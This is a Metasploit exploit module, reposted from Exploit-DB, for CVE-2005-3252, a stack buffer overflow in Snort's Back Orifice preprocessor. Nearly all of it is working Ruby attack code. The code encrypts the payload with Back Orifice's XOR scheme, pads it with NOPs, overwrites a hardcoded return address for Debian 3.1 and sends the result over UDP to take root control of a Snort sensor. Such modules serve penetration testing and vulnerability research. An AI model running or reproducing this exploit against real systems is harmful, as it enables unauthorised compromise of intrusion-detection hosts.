Snort Back Orifice – Pre-Preprocessor Remote (Metasploit)

  • 作者: Metasploit
    日期: 2010-07-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16834/
  • ##
# $Id: snortbopre.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
			'Description'=> %q{
					This module exploits a stack buffer overflow in the Back Orifice pre-processor module
				included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
				be used to completely compromise a Snort sensor, and would typically gain an attacker
				full root or administrative privileges.
			},
			'Author' => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'=> BSD_LICENSE,
			'Version'=> '$Revision: 9669 $',
			'References' =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
				],
			'Payload'=>
				{
					'Space'=> 1073, #ret : 1069
					'BadChars' => "\x00",
				},
			'Targets'=>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'=> 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Oct 18 2005'))

		# Configure the default port to be 9080
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)
	end

	def msrand(seed)
		@holdrand = 31337
		end

	def mrand()
		return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
		end

	def bocrypt(takepayload)

		@arrpayload = (takepayload.split(//))

		encpayload = ""
		@holdrand=0
		msrand(0)

		@arrpayload.each do |c|
			encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
		end

		return encpayload
		end


	def exploit
		connect_udp

		boheader =
			"*!*QWTY?"+
			[1096].pack("V")+ # Length ,thanx Russell Sanford
			"\xed\xac\xef\x0d"+ # ID
			"\x01"# PING

		filler =
			make_nops(1069 -(boheader.length + payload.encode.length))

		udp_sock.write(
			bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
		)

		handler
		disconnect_udp
	end

end